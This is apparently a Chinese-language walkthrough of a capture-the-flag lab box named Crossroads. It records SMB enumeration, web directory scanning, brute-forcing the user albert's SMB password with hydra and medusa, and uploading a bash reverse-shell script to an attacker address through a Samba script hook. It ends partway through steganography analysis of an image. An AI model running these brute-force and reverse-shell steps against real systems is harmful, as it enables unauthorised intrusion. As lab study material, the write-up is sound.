信息收集

服务探测

我看tag是关于smb的就下来看看

简单扫一下

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0c       (Unknown: locally administered)
192.168.56.100  08:00:27:a1:14:59       (Unknown)
192.168.56.119  08:00:27:2c:66:06       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 3.111 seconds (82.29 hosts/sec). 3 responded

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.56.119
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 07:41 EDT
Nmap scan report for 192.168.56.119
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds

枚举Smb服务

果然开着139和445，可以利用enum4linux -a target_ip枚举一下

┌──(kali㉿kali)-[~]
└─$ enum4linux -a 192.168.56.119
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Sep 29 07:45:08 2024

 =========================================( Target Information )=========================================

Target ........... 192.168.56.119
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ##找到一堆用户名


 ===========================( Enumerating Workgroup/Domain on 192.168.56.119 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 192.168.56.119 )===============================

Looking up status of 192.168.56.119
        CROSSROADS      <00> -         B <ACTIVE>  Workstation Service
        CROSSROADS      <03> -         B <ACTIVE>  Messenger Service
        CROSSROADS      <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.56.119 )==================================


[+] Server 192.168.56.119 allows sessions using username '', password ''


 ===============================( Getting domain SID for 192.168.56.119 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 ==================================( OS information on 192.168.56.119 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 192.168.56.119 from srvinfo:
        CROSSROADS     Wk Sv PrQ Unx NT SNT Samba 4.9.5-Debian	##服务版本信息
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03


 ======================================( Users on 192.168.56.119 )======================================

index: 0x1 RID: 0x3e9 acb: 0x00000010 Account: albert   Name:   Desc:

user:[albert] rid:[0x3e9]

 ================================( Share Enumeration on 192.168.56.119 )================================


        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        smbshare        Disk
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            CROSSROADS

[+] Attempting to map shares on 192.168.56.119

//192.168.56.119/print$ Mapping: DENIED Listing: N/A Writing: N/A
//192.168.56.119/smbshare       Mapping: DENIED Listing: N/A Writing: N/A
##这里发现两个文件夹是Denied，拒绝的
[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.56.119/IPC$   Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.56.119 )===========================



[+] Attaching to 192.168.56.119 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] CROSSROADS
        [+] Builtin

[+] Password Info for Domain: CROSSROADS

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


 ======================================( Groups on 192.168.56.119 )======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 =================( Users on 192.168.56.119 via RID cycling (RIDS: 500-550,1000-1050) )=================


[I] Found new SID:
S-1-22-1

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-21-198007098-3908253677-2746664996 and logon username '', password ''

S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)
S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert (Local User)##有个albert用户

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\albert (Local User)

 ==============================( Getting printer info for 192.168.56.119 )==============================

No printers returned.


enum4linux complete on Sun Sep 29 07:45:28 2024

enum4linux -v target-ip 详细模式，显示enum4linux正在执行的基本命令

enum4linux -a target-ip 运行所有选项，除了基于字典的共享名猜测之外，

enum4linux -U target-ip 列出用户名（如果服务器允许）-（RestrictAnonymous = 0）

enum4linux -u administrator -p password -U target-ip 如果您设法获得了凭据，则可以提取完整的用户列表，而不管RestrictAnonymous选项如何。

enum4linux -r target-ip 从默认RID范围（500-550,1000-1050）中提取用户名

enum4linux -R 600-660 target-ip 使用自定义RID范围提取用户名

enum4linux -G target-ip 列出组。如果服务器允许，您还可以指定用户名-u和密码-p

enum4linux -S target-ip 列出Windows共享，同样可以指定用户名-u和密码-p

enum4linux -s shares.txt target-ip 如果服务器不允许您检索共享列表，请执行字典攻击

enum4linux -o target-ip 使用smbclient获取操作系统信息，这可以在某些Windows版本上获取Service Pack版本

enum4linux -i target-ip 拉取有关拆卸设备已知打印机的信息。

`enum4linux -v target-ip`	详细模式，显示enum4linux正在执行的基本命令
`enum4linux -a target-ip`	运行所有选项，除了基于字典的共享名猜测之外，
`enum4linux -U target-ip`	列出用户名（如果服务器允许）-（RestrictAnonymous = 0）
`enum4linux -u administrator -p password -U target-ip`	如果您设法获得了凭据，则可以提取完整的用户列表，而不管RestrictAnonymous选项如何。
`enum4linux -r target-ip`	从默认RID范围（500-550,1000-1050）中提取用户名
`enum4linux -R 600-660 target-ip`	使用自定义RID范围提取用户名
`enum4linux -G target-ip`	列出组。如果服务器允许，您还可以指定用户名`-u`和密码`-p`
`enum4linux -S target-ip`	列出Windows共享，同样可以指定用户名`-u`和密码`-p`
`enum4linux -s shares.txt target-ip`	如果服务器不允许您检索共享列表，请执行字典攻击
`enum4linux -o target-ip`	使用smbclient获取操作系统信息，这可以在某些Windows版本上获取Service Pack版本
`enum4linux -i target-ip`	拉取有关拆卸设备已知打印机的信息。

具体关于端口139和445的利用可以看下这个文章139,445 - Pentesting SMB | HackTricks

或者利用nmap加script也可以扫到共享的目录

┌──(kali㉿kali)-[~]
└─$ ls /usr/share/nmap/scripts|grep "smb"
smb2-capabilities.nse
smb2-security-mode.nse
smb2-time.nse
smb2-vuln-uptime.nse
smb-brute.nse
smb-double-pulsar-backdoor.nse
smb-enum-domains.nse
smb-enum-groups.nse
smb-enum-processes.nse
smb-enum-services.nse
smb-enum-sessions.nse
smb-enum-shares.nse
smb-enum-users.nse
smb-flood.nse
smb-ls.nse
smb-mbenum.nse
smb-os-discovery.nse
smb-print-text.nse
smb-protocols.nse
smb-psexec.nse
smb-security-mode.nse
smb-server-stats.nse
smb-system-info.nse
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-cve-2017-7494.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-ms17-010.nse
smb-vuln-regsvc-dos.nse
smb-vuln-webexec.nse
smb-webexec-exploit.nse
┌──(kali㉿kali)-[~]
└─$ nmap --script smb-enum-shares 192.168.56.119 -p 445
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 08:10 EDT
Nmap scan report for 192.168.56.119
Host is up (0.0024s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\192.168.56.119\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba 4.9.5-Debian)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.56.119\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.168.56.119\smbshare:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\albert\smbshare
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

┌──(kali㉿kali)-[~]
└─$ smbclient --no-pass -L 192.168.56.119

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        smbshare        Disk
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            CROSSROADS
        ┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.56.119/smbshare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.56.119/print$
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED

既然不给访问那就尝试爆破smb服务

┌──(kali㉿kali)-[~/temp/corssroad]
└─$ nmap --script smb-brute -p 445 192.168.56.119
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 08:47 EDT
Nmap scan report for 192.168.56.119
Host is up (0.0014s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-brute:
|_  No accounts found

Nmap done: 1 IP address (1 host up) scanned in 34.75 seconds

GG了，心态爆炸了，还爆不出，换个方向，忘了靶机还开了个80端口

目录扫描

访问一下，没想到这个crossroads页面还挺丰富的，扫一下目录

┌──(kali㉿kali)-[~/temp/corssroad]
└─$ feroxbuster -u http://192.168.56.119 -w /usr/share/seclists/Discovery/Web-Content/common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.119
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET     1056l     5183w    93075c http://192.168.56.119/
200      GET     1056l     5183w    93075c http://192.168.56.119/index.html
200      GET        2l        4w       42c http://192.168.56.119/robots.txt
[####################] - 17s     4775/4775    0s      found:3       errors:20
[####################] - 17s     4728/4728    285/s   http://192.168.56.119/
┌──(kali㉿kali)-[~/temp/corssroad]
└─$ curl 192.168.56.119/robots.txt
User-agent: *
Disallow: /crossroads.png

发现一下robots.txt

有个图片，难不成是图片隐写？？？我binwalk和foremost都尝试了，无果。

那就再扫一边，这次加点文件后缀

┌──(kali㉿kali)-[~/temp/corssroad]
└─$ feroxbuster -u http://192.168.56.119 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt,png,html,zip,bak

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.119
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [txt, png, html, zip, bak]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET     1056l     5183w    93075c http://192.168.56.119/
200      GET     1056l     5183w    93075c http://192.168.56.119/index.html
200      GET        4l       13w      108c http://192.168.56.119/note.txt
200      GET        2l        4w       42c http://192.168.56.119/robots.txt
[####################] - 3m     28650/28650   0s      found:4       errors:30
[####################] - 3m     28368/28368   171/s   http://192.168.56.119/

果然不出意外，扫到一个note.txt，给了个提示，这都啥啊，小猴挠头了，看了下答案，回头去枚举smb

Smb爆破

在使用 enum4linux 枚举时有个用户名为albert，其实我一开始有注意到这个用户，用九头蛇爆破一下，很慢很慢，提示我还要42小时，那我直接放弃，直到看答案才知道用美杜莎破解会很快，没几秒就出来了，

┌──(kali㉿kali)-[~/temp/corssroad]
└─$ hydra -l albert -P /usr/share/wordlists/rockyou.txt 192.168.56.119 smb -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-29 10:23:22
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.119:445/
[STATUS] 5626.00 tries/min, 5626 tries in 00:01h, 14338773 to do in 42:29h, 1 active
[STATUS] 5668.67 tries/min, 17006 tries in 00:03h, 14327393 to do in 42:08h, 1 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
┌──(kali㉿kali)-[~/temp/corssroad]
└─$ medusa -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt -h 192.168.56.119 -t 10
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT FOUND: [smbnt] Host: 192.168.56.119 User: albert Password: bradley1 [SUCCESS (ADMIN$ - Share Unavailable)] ##bradley1这个就是密码
ACCOUNT CHECK: [smbnt] Host: 192.168.56.119 (1 of 1, 0 complete) User: albert (1 of 1, 1 complete) Password: peaceout (3859 of 14344391 complete)

真的，那个时候我人都麻了，有密码那就啥都好解决了，smbclient连一下

┌──(kali㉿kali)-[~/temp/corssroad]
└─$ smbclient //192.168.56.119/smbshare -U albert%bradley1
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Mar  2 17:16:13 2021
  ..                                  D        0  Tue Mar  2 18:16:15 2021
  smb.conf                            N     8779  Tue Mar  2 17:14:54 2021

         4000320 blocks of size 1024. 3759668 blocks available
smb: \> get smb.conf
getting file \smb.conf of size 8779 as smb.conf (659.5 KiloBytes/sec) (average 659.5 KiloBytes/sec)

发现有个smb.conf把文件get到本地，是个smb服务的配置文件，cat了一下发现有个script

Bash反弹Shell

在smb官方文档中找到了这一参数的解释，可能是事件触发操作大概率可以自己写一个反弹shell到smbscript.sh上，然后让服务器执行，这样就能拿到albert的shell了

┌──(kali㉿kali)-[~/temp/corssroad]
└─$ vim smbscript.sh
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.56.102/4444 0>&1'
┌──(kali㉿kali)-[~/temp/corssroad]
└─$ smbclient //192.168.56.119/smbshare -U albert%bradley1
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Mar  2 17:16:13 2021
  ..                                  D        0  Tue Mar  2 18:16:15 2021
  smb.conf                            N     8779  Tue Mar  2 17:14:54 2021

         4000320 blocks of size 1024. 3759668 blocks available
smb: \> put smbscript.sh
NT_STATUS_IO_TIMEOUT closing remote file \smbscript.sh
smb: \>

尝试一下，果不其然，一put上去立马执行了反弹shell

提权albert用户

上去之后先升级交互式shell

/usr/bin/script -qc /bin/bash /dev/null
ctrl+z
stty raw -echo ;fg
reset
xterm

albert@crossroads:/home/albert/smbshare$ ls
smb.conf  smbscript.sh
albert@crossroads:/home/albert/smbshare$ cd ..
albert@crossroads:/home/albert$ ls
beroot  crossroads.png  smbshare  user.txt
albert@crossroads:/home/albert$ cat user.txt
912D12370BBCEA67BF28B03BCB9AA13Falbert@crossroads:/home/albert$
albert@crossroads:/home/albert$ strings beroot
bash: strings: command not found
albert@crossroads:/home/albert$ ./beroot
TERM environment variable not set.
enter password for root
-----------------------

password: admin
wrong password!!!

进来之后直接拿到了user，然后我还发现了一个beroot的文件很可疑，想用strings分析一下，结果靶机上没装这个

我尝试运行了一下这个程序，发现什么终端环境没设置，还有一个input让你输入password，然而我发现靶机上有python，那就用python开个http服务，kali上使用wget拿一下文件通过strings分析一下

先是setuid然后通过/bin/bash执行了/root下的beroot.sh，那关键root下的文件也没权限看啊

看了下答案，漏了一个点，之前wget下来图片还真是隐写，只不过工具不对，分析不出来，你光看看图片大小有1.1MB

┌──(kali㉿kali)-[~/temp/corssroad]
└─$ ls -lh
total 149M
-rw-r--r-- 1 kali kali  17K Mar  2  2021 beroot
-rw-r--r-- 1 kali kali 1.1M Mar  2  2021 crossroads.png
-rw-r--r-- 1 kali kali 148M Sep 29 10:28 hydra.restore
-rw-r--r-- 1 kali kali 8.6K Sep 29 10:34 smb.conf
-rw-r--r-- 1 kali kali   67 Sep 29 10:53 smbscript.sh

哦哦，发现了提示还真给我们了，没注意看到，note提示找到蓝调之王然后前往十字路口，搜了一下albert加蓝调之王关键词，结果还真有，卧槽

那就没错了，图片包是有问题的

图片隐写

通过stegoveritas工具解码一下，具体下载可以通过github上有readmebannsec/stegoVeritas: Yet another Stego Tool (github.com)

pip3 install stegoveritas
##这里要注意stegoveritas被pip安装到哪个目录下，一般在家目录的隐藏文件夹下
##然后运行一下
┌──(kali㉿kali)-[~/temp/corssroad]
└─$ ./stegoveritas -out /home/kali/temp/corssroad/output /home/kali/temp/corssroad/crossroads.png
┌──(kali㉿kali)-[~/temp/corssroad]
└─$ cd output
┌──(kali㉿kali)-[~/temp/corssroad/output]
└─$ ls
audit.txt                                  crossroads.png_Green_3.png
crossroads.png_autocontrast.png            crossroads.png_Green_4.png
crossroads.png_Blue_0.png                  crossroads.png_Green_5.png
crossroads.png_Blue_1.png                  crossroads.png_Green_6.png
crossroads.png_Blue_2.png                  crossroads.png_Green_7.png
crossroads.png_Blue_3.png                  crossroads.png_green_plane.png
crossroads.png_Blue_4.png                  crossroads.png_inverted.png
crossroads.png_Blue_5.png                  crossroads.png_Max.png
crossroads.png_Blue_6.png                  crossroads.png_Median.png
crossroads.png_Blue_7.png                  crossroads.png_Min.png
crossroads.png_blue_plane.png              crossroads.png_Mode.png
crossroads.png_Edge-enhance_More.png       crossroads.png_Red_0.png
crossroads.png_Edge-enhance.png            crossroads.png_Red_1.png
crossroads.png_enhance_sharpness_-100.png  crossroads.png_Red_2.png
crossroads.png_enhance_sharpness_100.png   crossroads.png_Red_3.png
crossroads.png_enhance_sharpness_-25.png   crossroads.png_Red_4.png
crossroads.png_enhance_sharpness_25.png    crossroads.png_Red_5.png
crossroads.png_enhance_sharpness_-50.png   crossroads.png_Red_6.png
crossroads.png_enhance_sharpness_50.png    crossroads.png_Red_7.png
crossroads.png_enhance_sharpness_-75.png   crossroads.png_red_plane.png
crossroads.png_enhance_sharpness_75.png    crossroads.png_Sharpen.png
crossroads.png_equalize.png                crossroads.png_Smooth.png
crossroads.png_Find_Edges.png              crossroads.png_solarized.png
crossroads.png_GaussianBlur.png            exif
crossroads.png_grayscale.png               keepers
crossroads.png_Green_0.png                 png
crossroads.png_Green_1.png                 xmp
crossroads.png_Green_2.png
┌──(kali㉿kali)-[~/temp/corssroad/output]
└─$ cd keepers
┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
└─$ ls -al
total 2516
drwxr-xr-x 2 kali kali    4096 Sep 29 11:22 .
drwxr-xr-- 6 kali kali    4096 Sep 29 11:22 ..
-rw-r--r-- 1 kali kali  363321 Sep 29 11:22 1727623330.117111-17ce4c514a3264a654af67a50dd650b2
-rw-r--r-- 1 kali kali 1100255 Sep 29 11:22 1727623338.8052254-7bf5c1adcecee47bf66f8c2c2841d365
-rw-r--r-- 1 kali kali       0 Sep 29 11:22 69F
-rw-r--r-- 1 kali kali 1098560 Sep 29 11:22 69F.zlib
┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
└─$ file 1727623330.117111-17ce4c514a3264a654af67a50dd650b2
1727623330.117111-17ce4c514a3264a654af67a50dd650b2: MPEG ADTS, layer III, v1, 80 kbps, Monaural
┌──(kali㉿kali)-[~/temp/corssroad/output/keepers] ##视频
└─$ file 1727623338.8052254-7bf5c1adcecee47bf66f8c2c2841d365
1727623338.8052254-7bf5c1adcecee47bf66f8c2c2841d365: PNG image data, 1106 x 876, 8-bit/color RGB, non-interlaced ##图片

b养的，崩溃了，先睡觉

隔了一天下午再来做这个，发现web上的图片和albert家目录的图片大小不一致

albert@crossroads:/home/albert$ ls -alh
total 1.6M
drwxr-xr-x 3 albert albert 4.0K Sep 10 10:42 .
drwxr-xr-x 3 root   root   4.0K Mar  2  2021 ..
-rw------- 1 albert albert  625 Sep 13 03:30 .bash_history
-rwsr-xr-x 1 root   root    17K Mar  2  2021 beroot
-rw-r--r-- 1 albert albert 1.6M Mar  2  2021 crossroads.png		##这个1.6MB显然大一点
-rw------- 1 albert albert    7 Sep 10 10:05 .python_history
drwxrwxrwx 2 albert albert 4.0K Sep 13 03:30 smbshare
-r-x------ 1 albert albert   32 Mar  2  2021 user.txt
albert@crossroads:/home/albert$ ls -ahl /var/www/html
total 1.2M
drwxr-xr-x 2 root root 4.0K Mar  2  2021 .
drwxr-xr-x 3 root root 4.0K Dec 17  2020 ..
-rw-r--r-- 1 root root 1.1M Mar  2  2021 crossroads.png		##这个有1.1MB隐写解码没什么东西
-rw-r--r-- 1 root root  91K Mar  1  2021 index.html
-rw-r--r-- 1 root root  108 Mar  2  2021 note.txt
-rw-r--r-- 1 root root   42 Mar  2  2021 robots.txt

重新从靶机上wget下新的图片，重新使用stegoveritas解码一下

┌──(kali㉿kali)-[~/temp/corssroad]
└─$ cd output

┌──(kali㉿kali)-[~/temp/corssroad/output]
└─$ ls
crossroads.png_Alpha_0.png                 crossroads.png_GaussianBlur.png
crossroads.png_Alpha_1.png                 crossroads.png_grayscale.png
crossroads.png_Alpha_2.png                 crossroads.png_Green_0.png
crossroads.png_Alpha_3.png                 crossroads.png_Green_1.png
crossroads.png_Alpha_4.png                 crossroads.png_Green_2.png
crossroads.png_Alpha_5.png                 crossroads.png_Green_3.png
crossroads.png_Alpha_6.png                 crossroads.png_Green_4.png
crossroads.png_Alpha_7.png                 crossroads.png_Green_5.png
crossroads.png_alpha_plane.png             crossroads.png_Green_6.png
crossroads.png_Blue_0.png                  crossroads.png_Green_7.png
crossroads.png_Blue_1.png                  crossroads.png_green_plane.png
crossroads.png_Blue_2.png                  crossroads.png_Max.png
crossroads.png_Blue_3.png                  crossroads.png_Median.png
crossroads.png_Blue_4.png                  crossroads.png_Min.png
crossroads.png_Blue_5.png                  crossroads.png_Mode.png
crossroads.png_Blue_6.png                  crossroads.png_Red_0.png
crossroads.png_Blue_7.png                  crossroads.png_Red_1.png
crossroads.png_blue_plane.png              crossroads.png_Red_2.png
crossroads.png_Edge-enhance_More.png       crossroads.png_Red_3.png
crossroads.png_Edge-enhance.png            crossroads.png_Red_4.png
crossroads.png_enhance_sharpness_-100.png  crossroads.png_Red_5.png
crossroads.png_enhance_sharpness_100.png   crossroads.png_Red_6.png
crossroads.png_enhance_sharpness_-25.png   crossroads.png_Red_7.png
crossroads.png_enhance_sharpness_25.png    crossroads.png_red_plane.png
crossroads.png_enhance_sharpness_-50.png   crossroads.png_Sharpen.png
crossroads.png_enhance_sharpness_50.png    crossroads.png_Smooth.png
crossroads.png_enhance_sharpness_-75.png   exif
crossroads.png_enhance_sharpness_75.png    keepers
crossroads.png_Find_Edges.png

┌──(kali㉿kali)-[~/temp/corssroad/output]
└─$ cd keepers

┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
└─$ ls
1727685571.6234832-376557ecdfc96397933f18a9fa06d6ac
1727685573.5237014-d666834adaa6e1029b35a828e5ad2805
1727685585.443169-e1ce81f59bae613c2f1da5638116856b
1727685585.4457736-6f34bd16842be44659d0d876d0dfcf83
1727685586.6834607-0297ec6580ecff58ccad5bbbe59bc5f2
1727685587.4973614-1359e22a94d0df136966babb5e668a92
1727685587.516955-8b932127cc380ecfc9a2bb37d3896491
1727685587.8059962-10e141f3ee9187bb1106553195c0748c
1727685588.4770668-b5d7a9c793e9cf4b839d0758691571e9
1727685589.0947762-af9f70f7a4b8c74ff55143e60dbb9438
1727685590.2928293-c21199fd764f0323e5a34532f88c51af
1727685590.3163085-912a2e1251f29a2988cd930af38f3fa6
1727685593.3104098-fa51a28691a55bf95997aee4dc82e84f
1727685609.7496212-7cec4317951424c2c802d0fbe9e32556
29
29.zlib

这回就多了很多文件，用file分析一下文件类型

┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
└─$ for i in $(ls 17276*);do file $i;done		##这里用循环遍历了一下文件名
1727685571.6234832-376557ecdfc96397933f18a9fa06d6ac: ISO-8859 text	##txt
1727685573.5237014-d666834adaa6e1029b35a828e5ad2805: MPEG ADTS, layer III, v1, 80 kbps, Monaural
1727685585.443169-e1ce81f59bae613c2f1da5638116856b: ISO-8859 text, with very long lines (65536), with no line terminators
1727685585.4457736-6f34bd16842be44659d0d876d0dfcf83: ISO-8859 text, with very long lines (65536), with no line terminators
1727685586.6834607-0297ec6580ecff58ccad5bbbe59bc5f2: MPEG ADTS, layer III, v2, 144 kbps, 16 kHz, Stereo
1727685587.4973614-1359e22a94d0df136966babb5e668a92: ISO-8859 text, with very long lines (65536), with no line terminators
1727685587.516955-8b932127cc380ecfc9a2bb37d3896491: MPEG ADTS, layer II, v1, 32 kHz, JntStereo
1727685587.8059962-10e141f3ee9187bb1106553195c0748c: ISO-8859 text, with very long lines (65536), with no line terminators
1727685588.4770668-b5d7a9c793e9cf4b839d0758691571e9: ISO-8859 text, with very long lines (65536), with no line terminators
1727685589.0947762-af9f70f7a4b8c74ff55143e60dbb9438: ISO-8859 text, with very long lines (65536), with no line terminators
1727685590.2928293-c21199fd764f0323e5a34532f88c51af: ISO-8859 text, with very long lines (65536), with no line terminators
1727685590.3163085-912a2e1251f29a2988cd930af38f3fa6: ISO-8859 text	##txt
1727685593.3104098-fa51a28691a55bf95997aee4dc82e84f: ISO-8859 text, with very long lines (65536), with no line terminators
1727685609.7496212-7cec4317951424c2c802d0fbe9e32556: PNG image data, 1106 x 876, 8-bit/color RGBA, non-interlaced
┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
└─$ head 1727685571.6234832-376557ecdfc96397933f18a9fa06d6ac
lakers1
girls
bob123
babypink
12369874
tiago
shanna
monroe
leilani
larry
┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
└─$ head 1727685590.3163085-912a2e1251f29a2988cd930af38f3fa6
lakers1
girls
bob123
babypink
12369874
tiago
shanna
monroe
leilani
larry
┌──(kali㉿kali)-[~/temp/corssroad/output/keepers]
